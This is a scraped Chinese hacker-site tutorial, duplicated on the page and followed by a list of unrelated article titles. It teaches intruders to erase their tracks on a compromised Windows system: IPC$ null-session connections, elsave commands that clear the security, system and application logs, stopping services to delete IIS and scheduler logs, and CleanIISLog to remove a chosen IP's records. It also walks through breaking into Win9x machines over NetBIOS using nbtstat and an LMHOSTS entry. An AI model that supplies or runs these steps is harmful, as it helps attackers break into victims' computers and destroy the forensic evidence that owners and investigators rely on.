简单黑客工具使用
来源:百度文库 编辑:神马文学网 时间:2024/03/29 19:40:17
1.小榕的elsave清除日志的使用:
先用ipc$管道进行连接:net use \\ip\ipc$ "password" /user:""
清除目标系统的应用程序日志:
elsave -s \\ip -l "application" -C
清除目标系统的系统日志:
elsave -s \\ip -l "system"" -C
清除目标系统的安全日志:
elsave -s \\ip -l "security" -C
2.windows2000日志的清除:
www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:net stop w3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.
win2000中的其他一些日志:
安全日志:%winsystem%\system32\config\Secevent.evt
应用程序日志:%winsystem%\system32\config\AppEvent.evt
系统日志:%winsystem%\system32\config\SysEvent.evt
IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\,默认每天一个日志
IIS的www日志:%winsystem%\system32\logfiles\w3svc1\ 默认每天一个日志
Scheduler服务日志:%winsystem%\schedlgu.txt
注册表所在项目:
[HKLM]\system\CurrentControlSet\Services\Eventlog
Schedluler服务注册表所在项目:
[HKLM]\SOFTWARE\Microsoft\SchedulingAgent
如果日志被从新定位,路径在注册表里面有记录.
清除日志
清除日志必须先停掉相关的服务后才能进行:
www和ftp日志必须想停w3svc: net stop w3svc
然后就可在相关日志目录下面把你想要删除的日志删除.
Scheduler服务日志必须想停止:Task Scheduler服务才能删除日志: net stop "Task Scheduler"
系统,安全,应用程序等日志相关的服务是:Eventlog,但是该项目是无法直接停止的,我们可以先用ipc$连接过去,然后打开"控制面板"中的计算机管理中连接远程计算机,从里面删除相关的内容,但是如果日记比较多的话,可能需要比较多的时间,而且对网速要求比较高.但是,我们可以利用一个工具:小榕的elsave来删除.方法如上面第一项.
也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:
cleaniislog [logfile] [.] [cleanIP] .
说明: 清除的日志文件,.代表所有 清除的日志中哪个IP地址的记录,.代表所有IP记录
举例:cleaniislog . 127.0.0.1
A.可以清除指定的的IP连接记录,保留其他IP记录。
B.当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。
用法: CleanIISLog <.> <.>
: 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件注意:处理所有日志文件需要很长的时间)。
: 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不推荐这样做)。
CleanIISLog只能在本地运行,而且必须具有Administrators权限。
知道对方IP入侵别人的电脑
黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。 现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。 以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2010-01-06/58933.html
先用ipc$管道进行连接:net use \\ip\ipc$ "password" /user:""
清除目标系统的应用程序日志:
elsave -s \\ip -l "application" -C
清除目标系统的系统日志:
elsave -s \\ip -l "system"" -C
清除目标系统的安全日志:
elsave -s \\ip -l "security" -C
2.windows2000日志的清除:
www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:net stop w3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.
win2000中的其他一些日志:
安全日志:%winsystem%\system32\config\Secevent.evt
应用程序日志:%winsystem%\system32\config\AppEvent.evt
系统日志:%winsystem%\system32\config\SysEvent.evt
IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\,默认每天一个日志
IIS的www日志:%winsystem%\system32\logfiles\w3svc1\ 默认每天一个日志
Scheduler服务日志:%winsystem%\schedlgu.txt
注册表所在项目:
[HKLM]\system\CurrentControlSet\Services\Eventlog
Schedluler服务注册表所在项目:
[HKLM]\SOFTWARE\Microsoft\SchedulingAgent
如果日志被从新定位,路径在注册表里面有记录.
清除日志
清除日志必须先停掉相关的服务后才能进行:
www和ftp日志必须想停w3svc: net stop w3svc
然后就可在相关日志目录下面把你想要删除的日志删除.
Scheduler服务日志必须想停止:Task Scheduler服务才能删除日志: net stop "Task Scheduler"
系统,安全,应用程序等日志相关的服务是:Eventlog,但是该项目是无法直接停止的,我们可以先用ipc$连接过去,然后打开"控制面板"中的计算机管理中连接远程计算机,从里面删除相关的内容,但是如果日记比较多的话,可能需要比较多的时间,而且对网速要求比较高.但是,我们可以利用一个工具:小榕的elsave来删除.方法如上面第一项.
也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:
cleaniislog [logfile] [.] [cleanIP] .
说明: 清除的日志文件,.代表所有 清除的日志中哪个IP地址的记录,.代表所有IP记录
举例:cleaniislog . 127.0.0.1
A.可以清除指定的的IP连接记录,保留其他IP记录。
B.当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。
用法: CleanIISLog <.> <.>
: 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件注意:处理所有日志文件需要很长的时间)。
: 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不推荐这样做)。
CleanIISLog只能在本地运行,而且必须具有Administrators权限。
知道对方IP入侵别人的电脑
黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。 现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。 以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2010-01-06/58933.html
简单黑客工具使用
黑客工具之 加密破解
黑客工具之 远程控制
toplink使用简单介绍
黑客工具大全100套 -part1
SpringFramework中的AOP简单使用
Spring中的AOP简单使用
外置闪光灯简单使用技巧~
外置闪光灯简单使用技巧
外置闪光灯简单使用技巧~
外置闪光灯简单使用技巧
日志背景图片的简单使用
几款黑客工具的使用方法4
几款黑客工具的使用方法-5
收藏的黑客工具下载地址很齐全
黑客工具软件大全100套 -part1
收藏的黑客工具下载地址很齐全
PHP学习使用资源简单总结
使用Axis发布简单的Web服务
若干个使用简单的在线代理
Subversion的安装与简单使用
VS2005使用OpenMP最简单示例
有关TinyXML使用的简单总结
PHP学习使用资源简单总结